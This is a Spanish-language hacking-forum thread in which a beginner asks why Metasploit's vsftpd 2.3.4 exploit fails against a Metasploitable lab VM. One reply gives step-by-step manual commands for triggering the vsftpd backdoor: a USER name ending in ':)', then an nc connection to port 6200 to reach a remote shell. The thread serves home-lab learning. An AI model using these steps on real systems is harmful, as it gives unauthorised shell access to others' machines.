Foro de elhacker.net

Seguridad Informática => Hacking => Mensaje iniciado por: pepitom en 31 Mayo 2022, 17:42 pm



Título: Metasploit - [*] Exploit completed, but no session was created.
Publicado por: pepitom en 31 Mayo 2022, 17:42 pm
Buenas, estoy recién empezando a ver videos sobre ciberseguridad y estoy usando metasploit.
Instalé Metasploitable en vmware para probar las cosas que veo en los cursos. Pero estoy teniendo problemas cuando quiero ejecutar un exploit como el vsftpd 2.3.4 para atacar la máquina virtual, me sale el siguiente mensaje cuando lo ejecuto:
  • 192.168.0.193:21 - Banner: 220 (vsFTPd 2.3.4)
  • 192.168.0.193:21 - USER: 331 Please specify the password.
  • Exploit completed, but no session was created.
Termina ahí y no puedo seguir, no sé que hacer.


Título: Re: Metasploit - [*] Exploit completed, but no session was created.
Publicado por: 0x22 en 1 Junio 2022, 17:27 pm
A mi me pasa algo igual con la maquina metasploitable 2, no me va el exploit


Título: Re: Metasploit - [*] Exploit completed, but no session was created.
Publicado por: Panic0 en 23 Junio 2022, 02:49 am
Hola, usar Metasploit es aburrido (Te da todo pronto, solo disparas y listo)

Es mejor explotar esto de forma manual, te voy a explicar como:


1) Primero nos vamos a conectar por TelNet al puerto vsftpd de la maquina victima
Código:
> telnet [ip de la maquina victima] [puerto donde este el vsftpd 2.3.4]

--------------------------------------------------------
2) Vamos a agarrar y hacer lo siguiente (Es muy importante poner el ": )" )
Código:
> USER lo_que_quieras:)
Código:
> PASS otra_cosa
--------------------------------------------------------

3)  Pones CTRL + ], con esto vas a lograr salir del telnet
Código:
> ^]

--------------------------------------------------------

4) Pones quit
Código:
> telnet quit
--------------------------------------------------------

5)Finalmente, el exploit se ejecuta, despues de eso solo nos queda conectarnos a la backdoor  >:D
Código:
> nc [ip de la maquina victima] 6200
(Puerto 6200, porque es el que tiene la backdoor)